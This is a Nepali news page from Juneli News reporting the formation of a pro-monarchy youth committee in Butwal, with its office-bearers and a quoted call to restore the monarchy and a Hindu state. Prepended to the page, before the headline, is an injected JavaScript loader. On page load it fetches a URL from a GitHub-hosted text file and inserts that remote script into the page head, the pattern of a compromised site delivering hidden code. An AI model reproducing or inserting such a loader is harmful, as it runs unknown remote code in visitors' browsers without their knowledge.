;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बुटवलमा राजा आउ देश बचाउ भन्दै राजा निकट वीर गोर्खाली युवा अभियान समिति गठन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • बुटवलमा राजा आउ देश बचाउ भन्दै राजा निकट वीर गोर्खाली युवा अभियान समिति गठन
जुनेली बिशेष

बुटवलमा राजा आउ देश बचाउ भन्दै राजा निकट वीर गोर्खाली युवा अभियान समिति गठन

मंसिर ०४,

काठमाडौं । रुपन्देही जिल्लाको बुटवलमा राजा आउ देश बचाउ भन्दै राजा निकट वीर गोर्खाली युवा अभियान समिति गठन गरिएको छ । गत मंगलबार युवा अभियान्ताहरुको भेलाले सैनामैना नगरकमिटी गठन गरेको हो । प्रदिप पाण्डेको संयोजकमा २१ सदस्यीय कार्यसमिति गठन गरेको रुपन्देहीका वीर गोर्खाली युवा अभियान नेपालका सह-संयोजक राज शर्माले जुनेली न्युजलाई जानकारी दिए ।

त्यस्तै समितिको उपाध्यक्षमा बिष्णु सैजवाल, सचिवमा सागर ज्ञवाली, सह सचिवमा मनु पाण्डे र कोषाध्यक्षमा उपदेश पोख्रेल चयन भएका छन् ।

त्यसैगरी सदस्यरुमा हरि मित्रकोटी, जीवन रोकाहा, मिलन घिमिरे, किरण बस्नेत, कपिल घिमिरे, बिशाल क्षेत्री,कपिल पोख्रेल ,बिनोद घिमिरे,  महेश क्षेत्री, थमन सेजवाल, प्रशान्त पाण्डे, किरण पाण्डे, दिपक पाण्डे, सन्दिप भण्डारी, सतर्क कार्की र मनोज पोख्रेल चयन भएको उनले बताए ।

हालको सरकारले नेपाल र नेपालीको जिवन उकास्ने कुनै पनि काम गर्न नसकेको अवस्थामा अब देश बचाउन राजतन्त्र आवश्यकता परेको उनले बताए । राज संस्था सहितको हिन्दु राज्य स्थापना नै आजको आवश्यकता रहेको उनको भनाई छ ।

फेसबुक प्रतिक्रियाहरु